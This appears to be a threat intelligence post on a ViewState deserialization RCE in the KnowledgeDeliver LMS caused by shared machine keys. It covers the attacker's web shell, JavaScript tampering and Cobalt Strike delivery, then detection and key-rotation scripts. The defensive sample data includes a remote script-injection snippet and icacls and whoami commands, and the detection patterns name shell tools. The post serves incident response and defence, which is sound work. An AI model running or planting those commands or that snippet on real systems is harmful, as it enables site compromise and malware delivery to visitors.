In late 2025, Mandiant responded to an intrusion involving KnowledgeDeliver, a Learning Management System (LMS) developed by Digital Knowledge and widely used in Japan. The investigation uncovered a critical vulnerability that allowed unauthenticated Remote Code Execution (RCE), which an unknown threat actor used to inject malicious code into the platform and target users visiting the site.
The vulnerability stemmed from identical pre-shared ASP.NET machine keys being used across customer deployments: anyone holding the keys from one installation (or from the vendor's template) could forge ViewState payloads that every other installation would accept as authentic. Initially exploited as a zero-day, the vulnerability is now tracked as CVE-2026-5426.
Understanding the Vulnerability
KnowledgeDeliver installations prior to February 24, 2026, shipped with a standardized web.config file from the vendor. That file contained hardcoded values in the machineKey element, the keys ASP.NET uses to sign (validationKey) and encrypt (decryptionKey) data such as ViewState. Because every customer environment used the same keys, obtaining them from any one instance, or from the template itself, handed an attacker the keys to all of them.
For instance, the configuration line in the web.config file looked like this:
ASP.NET ViewState is the serialized page state that a page carries across postbacks in the hidden __VIEWSTATE form field. It is protected by a MAC (and optionally encryption) keyed by the machineKey, so an attacker who knows the key can serialize a malicious object graph, sign it so that it passes verification, and submit it in the __VIEWSTATE parameter of an HTTP request. The server accepts the payload as authentic and deserializes it, and a deserialization gadget chain executes attacker-chosen code inside the IIS worker process (w3wp.exe) under the application pool identity, with no authentication required.
Post-Exploitation Activities
After gaining access, the threat actors aimed to solidify their presence and broaden the impact of the breach.
Deployment of BLUEBEAM Web Shell
The attackers deployed BLUEBEAM (also referred to as Godzilla), a .NET-based web shell that runs in memory inside the IIS worker process (w3wp.exe), which makes it hard to find with conventional file-based scanning. It accepts further commands and follow-on payloads over encrypted HTTP POST requests.
File Manipulation
The threat actor executed commands to enhance control over the web server's file system:
- Permission Modification: The attacker used icacls to grant full access to the web application directory for all users.
- JavaScript Tampering: Modifications were made to an application JavaScript file to:
  - Display a deceptive security alert urging users to install a "security authentication plugin".
  - Load a malicious script from a remote domain without the user's knowledge.
Cobalt Strike Infection
The remote script tricked users into downloading a counterfeit installer, resulting in workstations being infected with a Cobalt Strike BEACON backdoor. The payload was encrypted with a key derived from the name of the compromised organization, indicating targeted preparation by the threat actor.
Monitoring for Exploitation
Organizations should be vigilant for the following indicators to detect potential ViewState exploitation and subsequent activities:
1. Application Event Logs (Event ID 1316)
Monitor the Windows Application log for Event ID 1316 from ASP.NET 4.0.30319.0 or similar:
- Failed Attempt: Event code 4009 (Viewstate verification failed) with a reason stating that the supplied ViewState failed the integrity check. The MAC did not verify, so the sender did not hold the key; in volume this is scanning or an attempt with the wrong key.
- Successful Execution: the same Event code 4009, but with a reason stating that the ViewState was invalid. Here the MAC verified, meaning the sender held the correct key, and the deserialized content was not valid page state, which is consistent with a deserialization gadget payload whose code has already run by the time ASP.NET rejects the result. Treat these entries as likely successful exploitation rather than noise.
2. Suspicious Process Activity
Watch for unusual child processes spawned by w3wp.exe, including:
- cmd.exe /c ...
- whoami
- powershell.exe
3. File Integrity Monitoring
Look for unauthorized modifications to .js, .aspx, or .config files in the web root, particularly for remote script loaders or unusual logic.
4. Anomalous User-Agent Strings
Monitor web request logs for unusual User-Agent strings that may suggest exploitation attempts, such as:
- Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.2 ...
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 ...
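The indicators above can be checked in code. The following Python script is an added example, not Mandiant's detection logic; it runs three of the four checks over constructed sample records (the event messages are modelled on ASP.NET health-monitoring output and the file contents are made up). It classifies Event ID 1316 / event code 4009 entries by their reason text, lists shell and reconnaissance children of w3wp.exe using the same pattern as the SecOps search at the end of this post with icacls added for the permission change described earlier, and diffs web-root files against a known-good baseline while looking for injected remote script loaders. The fourth indicator, User-Agent rarity, is a frequency question better answered in the SIEM and is not modelled here.

```python
"""Hunt for ViewState exploitation artifacts in ASP.NET/IIS telemetry.

Added example, not Mandiant or Digital Knowledge code. All records below are
constructed; the 1316 message text is modelled on ASP.NET health-monitoring output.
"""
import hashlib
import re

# 1. Application log: Event ID 1316 with event code 4009. The reason text tells a
#    wrong-key attempt (MAC failed) apart from a payload signed with the real key
#    (MAC passed, but the deserialized object was not page state).
EVENT_CODE_RE = re.compile(r"Event code:\s*4009\b", re.I)
REASON_RE = re.compile(r"Reason:\s*(.+)", re.I)


def classify_viewstate_event(event):
    """event: {"event_id": int, "message": str}. Returns "mac-failure",
    "invalid-viewstate", "other-4009" or None (not a 4009 event)."""
    if event["event_id"] != 1316 or not EVENT_CODE_RE.search(event["message"]):
        return None
    m = REASON_RE.search(event["message"])
    reason = m.group(1).lower() if m else ""
    if "integrity" in reason:
        return "mac-failure"
    if "invalid" in reason:
        return "invalid-viewstate"
    return "other-4009"


# 2. Children of the IIS worker. Same pattern as the SecOps search, extended with
#    icacls because of the permission change described in the post-exploitation section.
W3WP_CHILD_RE = re.compile(r"cmd.+ /c |whoami|powershell|icacls", re.I)


def suspicious_w3wp_children(proc_events):
    """proc_events: Sysmon 1 / Security 4688 style dicts. Returns matching command lines."""
    return [
        p["command_line"]
        for p in proc_events
        if p["parent_image"].lower().endswith("\\w3wp.exe")
        and W3WP_CHILD_RE.search(p["command_line"])
    ]


# 3. Web-root integrity: hash drift against a known-good deployment, plus a check
#    for JavaScript that injects a remote <script>, as the tampered LMS script did.
WEB_EXT = (".js", ".aspx", ".config")
REMOTE_LOADER_RE = re.compile(
    r"""createElement\(\s*['"]script['"]\s*\)|\.src\s*=\s*['"]https?://|<script[^>]+src\s*=\s*['"]https?://""",
    re.I,
)


def sha256(data):
    return hashlib.sha256(data).hexdigest()


def tampered_web_files(baseline_hashes, current_files):
    """baseline_hashes: {path: sha256 hex}; current_files: {path: bytes}.
    Returns {path: reason} for .js/.aspx/.config files that changed, appeared or load remote scripts."""
    findings = {}
    for path, data in current_files.items():
        if not path.lower().endswith(WEB_EXT):
            continue
        if path not in baseline_hashes:
            findings[path] = "new file"
        elif baseline_hashes[path] != sha256(data):
            findings[path] = "hash changed"
        if path.lower().endswith(".js") and REMOTE_LOADER_RE.search(data.decode("utf-8", "replace")):
            findings[path] = findings.get(path, "baseline hash") + "; loads remote script"
    return findings


# Constructed sample telemetry (not from the incident).
SAMPLE_EVENTS = [
    {"event_id": 1316, "message": "Event code: 4009\nEvent message: Viewstate verification failed. "
                                  "Reason: The viewstate supplied failed integrity check.\nRequest path: /Default.aspx"},
    {"event_id": 1316, "message": "Event code: 4009\nEvent message: Viewstate verification failed. "
                                  "Reason: Viewstate was invalid.\nRequest path: /Default.aspx"},
    {"event_id": 1309, "message": "Event code: 3005\nEvent message: An unhandled exception has occurred."},
]
SAMPLE_PROCS = [
    {"parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe", "command_line": "cmd.exe /c whoami"},
    {"parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe", "command_line": r"icacls C:\inetpub\wwwroot /grant Everyone:F /T"},
    {"parent_image": r"C:\Windows\explorer.exe", "command_line": "powershell.exe -File backup.ps1"},
]
GOOD_JS = b"function init(){ document.getElementById('login').focus(); }"
TAMPERED_JS = GOOD_JS + (b"\nalert('Install the security authentication plugin');"
                         b"var s=document.createElement('script');s.src='https://example.invalid/p.js';"
                         b"document.head.appendChild(s);")
BASELINE = {"/Scripts/app.js": sha256(GOOD_JS), "/Default.aspx": sha256(b"<%@ Page %>")}
CURRENT_FILES = {"/Scripts/app.js": TAMPERED_JS, "/Default.aspx": b"<%@ Page %>", "/Scripts/new.js": b"// untracked"}

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print("event:", classify_viewstate_event(e))
    print("w3wp children:", suspicious_w3wp_children(SAMPLE_PROCS))
    print("web files:", tampered_web_files(BASELINE, CURRENT_FILES))
```

In production the three inputs come from the Application event log, Sysmon or 4688 process creation events, and a hash manifest taken from a clean deployment of the same KnowledgeDeliver version; a 4009 "invalid" event followed within seconds by a w3wp.exe child in the hit list is the strongest combined signal.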
Remediation Strategies
- Rotate Machine Keys: Replace the vendor's hardcoded values with unique, cryptographically random validationKey and decryptionKey values on every KnowledgeDeliver instance (or use AutoGenerate on single-server deployments). Keys copied from the shared template must be treated as public; rotating them invalidates any ViewState payload signed with the old keys. Keep keys identical only across the nodes of a single web farm that must accept each other's ViewState.
- Restrict Access: Limit LMS access to known organizational IP ranges where possible.
- Conduct Investigations: Hunt for the indicators above on every instance that ran the shared keys, and, because the tampered JavaScript targeted site visitors, extend any investigation to the workstations of users who visited an affected LMS.
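Both the root cause described under "Understanding the Vulnerability" (identical machineKey values across deployments) and the first remediation item above come down to one check and one action: find configurations that share a validationKey/decryptionKey pair, and replace them with per-instance random keys. The following Python script is an added example, not vendor or Mandiant code, and the key values in it are invented placeholders rather than the KnowledgeDeliver keys; it parses a set of web.config files, reports key pairs reused across deployments, and rewrites a config with fresh keys while leaving the rest of the file untouched.

```python
"""Audit and rotate ASP.NET <machineKey> settings across a fleet of web.config files.

Added example, not vendor or Mandiant code. The key values below are placeholders
invented for the sample, not the KnowledgeDeliver keys.
"""
import re
import secrets
import xml.etree.ElementTree as ET
from collections import defaultdict

MACHINEKEY_RE = re.compile(r"<machineKey\b[^>]*>", re.I)   # machineKey is an empty element


def parse_machine_key(config_xml):
    """Return the attributes of <system.web><machineKey/> as a dict, or None if absent."""
    root = ET.fromstring(config_xml)
    for system_web in root.iter("system.web"):
        mk = system_web.find("machineKey")
        if mk is not None:
            return dict(mk.attrib)
    return None


def find_shared_keys(configs):
    """configs: {deployment name: web.config text}.
    Returns {(validationKey, decryptionKey): [deployments]} for key pairs used by more
    than one deployment. AutoGenerate keys are per machine and are never shared."""
    users = defaultdict(list)
    for name, xml in configs.items():
        mk = parse_machine_key(xml)
        if mk is None:
            continue  # ASP.NET default: AutoGenerate,IsolateApps
        vk = mk.get("validationKey", "AutoGenerate").lower()
        dk = mk.get("decryptionKey", "AutoGenerate").lower()
        if vk.startswith("autogenerate") or dk.startswith("autogenerate"):
            continue
        users[(vk, dk)].append(name)
    return {pair: names for pair, names in users.items() if len(names) > 1}


def generate_machine_key():
    """Fresh keys for one instance: 64 random bytes for HMACSHA256, 32 for AES-256."""
    return {
        "validationKey": secrets.token_hex(64).upper(),
        "decryptionKey": secrets.token_hex(32).upper(),
        "validation": "HMACSHA256",
        "decryption": "AES",
    }


def rotate_machine_key(config_xml):
    """Return the config text with <machineKey> replaced by freshly generated keys.
    Text substitution rather than a DOM rewrite keeps comments and formatting intact."""
    attrs = generate_machine_key()
    element = "<machineKey " + " ".join(f'{k}="{v}"' for k, v in attrs.items()) + " />"
    if MACHINEKEY_RE.search(config_xml):
        return MACHINEKEY_RE.sub(lambda m: element, config_xml, count=1)
    # No element at all (AutoGenerate default): add one directly under an opening <system.web>
    return re.sub(r"<system\.web\b[^>/]*>", lambda m: m.group(0) + "\n    " + element, config_xml, count=1)


def _sample_config(validation_key, decryption_key):
    """Constructed web.config in the shape of a vendor template (values are placeholders)."""
    return f"""<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <system.web>
    <!-- shipped in the vendor template -->
    <machineKey validationKey="{validation_key}" decryptionKey="{decryption_key}"
                validation="HMACSHA256" decryption="AES" />
    <compilation targetFramework="4.8" />
  </system.web>
</configuration>
"""


TEMPLATE_VK = "A1" * 64  # placeholder standing in for a hardcoded template key
TEMPLATE_DK = "B2" * 32
SAMPLE_CONFIGS = {
    "tenant-a": _sample_config(TEMPLATE_VK, TEMPLATE_DK),
    "tenant-b": _sample_config(TEMPLATE_VK, TEMPLATE_DK),   # same template, same keys
    "tenant-c": _sample_config(secrets.token_hex(64).upper(), secrets.token_hex(32).upper()),
}

if __name__ == "__main__":
    for (vk, _), names in find_shared_keys(SAMPLE_CONFIGS).items():
        print(f"validationKey {vk[:12]}... shared by: {', '.join(names)}")
    rotated = rotate_machine_key(SAMPLE_CONFIGS["tenant-a"])
    print("rotated validationKey:", parse_machine_key(rotated)["validationKey"][:12], "...")
```

Write the rotated text back to each server's web.config; ASP.NET restarts the application when that file changes, so the new keys take effect immediately and every ViewState or forms-authentication ticket signed with the old keys stops validating. On a web farm generate one key pair per farm, not per node.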
Conclusion
The exploitation of KnowledgeDeliver underscores the significant risks associated with using shared secrets in deployment templates. A single compromised key can jeopardize an entire ecosystem of installations. By employing unique secrets and robust monitoring, organizations can better defend against such deserialization attacks.
Indicators of Compromise (IOCs)
| File Name | Type | SHA-256 |
|---|---|---|
| LoadLibrary.dll | BLUEBEAM | 7c1f99dca8e5a7897892f9d224a6495023a2cfd2671697d229d355978c415ed2 |
Security Operations (SecOps) Recommendations
Utilize the following SecOps searches to identify this activity:
Event log search for ViewState verification failures (Event ID 1316, event code 4009):

```
(metadata.log_type = "WINEVTLOG" or metadata.log_type = "WINEVTLOG_XML")
metadata.product_event_type = "1316"
additional.fields["Message"] = /Event code: 4009\b/ nocase
```

Process search for shell or reconnaissance commands spawned by the IIS worker process:

```
(metadata.event_type = "PROCESS_LAUNCH" or metadata.event_type = "PROCESS_OPEN")
AND principal.process.command_line = /w3wp.exe/ nocase
AND target.process.command_line = /cmd.+ \/c |whoami|powershell/ nocase
```

SecOps customers can access various rules under the Mandiant Hunting Rules for further insights.